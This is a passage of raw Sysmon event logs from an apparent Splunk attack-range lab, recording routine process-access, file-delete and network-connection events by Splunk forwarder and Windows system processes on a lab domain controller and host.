23542300x8000000000000000219063Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:02.612{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8561295054C877EEB94843EF47FD79B,SHA256=0A6E948CE80E14EFFDE26D8E4A1D7BBC382588CD989BCC0FF68200549F3A678A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294839Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:02.107{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-14A2-6216-A406-000000003802}5608C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294838Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:02.091{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294837Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:02.091{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294836Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:02.091{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294835Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:02.091{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294834Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:02.091{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-14A2-6216-A406-000000003802}5608C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294833Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:02.091{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-14A2-6216-A406-000000003802}5608C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294832Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:02.093{C8EA50B7-14A2-6216-A406-000000003802}5608C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000294831Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:02.015{C8EA50B7-14A1-6216-A306-000000003802}69125288C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294849Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:03.978{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294848Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:03.978{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294847Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:03.978{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294846Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:03.978{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294845Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:03.978{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-14A3-6216-A506-000000003802}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294844Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:03.978{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-14A3-6216-A506-000000003802}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294843Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:03.979{C8EA50B7-14A3-6216-A506-000000003802}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294842Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:03.712{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D38F081081FBB5689F5B4E1465DB22EE,SHA256=1A7610C438716D207B9B380B287F06F17B9CEDC6D286F0C4CD425D93D3EEDD51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219065Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:03.643{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DCFACCA7B0ABEE15DFBA02C80392FF1,SHA256=0AADD5272A2B50CAAE64982DEFEF23534E8CB090C5F0469E40BA61F5D58030C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219064Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:01.301{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx61927-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219067Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:04.831{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCDF8AD27149F832294740EFCAE76BBB,SHA256=B2F2CC38C91BFCC4FFA287765AEE8CA6BCC3A952F635E83D9E3F6A610E1AAE86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294851Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:04.764{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B63315D0D757B3361AB0BC2B3A5D8F7D,SHA256=35BA8294D402FD6CCA40D683D55EE3D312C017F74B69AE073917A15BA1462623,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294850Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:03.978{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-14A3-6216-A506-000000003802}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000219066Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:04.440{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50F27FE9F53904919FC8719F370D8EBF,SHA256=638C8B5B78C88A64533BB4FA0BB6DAD609C59305F73736BDC88354AFDCE60514,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219068Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:05.971{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6F00375830BAD8A2F43023CDF1E45F6,SHA256=5F0171FC713EE93440418223ABFA0612476A9DA80ECC764130D4598CEBF2B432,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294854Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:03.305{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49181-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000294853Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:03.305{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49181-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000294852Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:05.784{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9D7F159DD2018A8955DB40C70320AA4,SHA256=7FA042A8B52DD68A33BD890CA1F5F46E595E205AFFAB95FE3D3A2AB6AF35B5D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294855Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:06.799{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F89CED1A06C18F14CA86B49499BBAE2,SHA256=D016794A6F62392388CEA32E2CD8518292CB44786D58C5789957709B0B0A5F0B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219070Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:04.630{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx52023-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 354300x8000000000000000219069Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:04.482{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51497-false10.0.1.12-8000- 23542300x8000000000000000294856Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:07.815{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8C3F32A2F7DE5A9379A222F5EDD662B,SHA256=27D782813AA6F2E557E204AE2E0D7C3B9EED4D0A068F1026DC398D78578304A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219072Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:07.831{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CDC37049EF2EE10597475B98E8F69F86,SHA256=4F0FD6AE6605556164B8E0F682641CD80A915F231E17CEF64BFD097CB858DDB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219071Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:07.002{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9EE956DA0932249272055EEE51B358B,SHA256=24DCE6E8B6F17A664309451CA6640D256B5E7D6A83BE4364324B8749AB4B9ABC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294860Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:06.588{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49182-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294859Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:08.830{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A37C06BCDB6B9B5E498A6E5AB0CDF5A9,SHA256=60F07336FE659EB173E17B0446510307F7E447594A61654F08A30D7A599E2957,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219073Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:08.065{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24A8A67FD1D97271904A9708FD779BD5,SHA256=BAA91A9E09444B0153513FA41F979C10EF39F2246D700CD81D7D87DBDC5677D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294858Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:08.584{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program 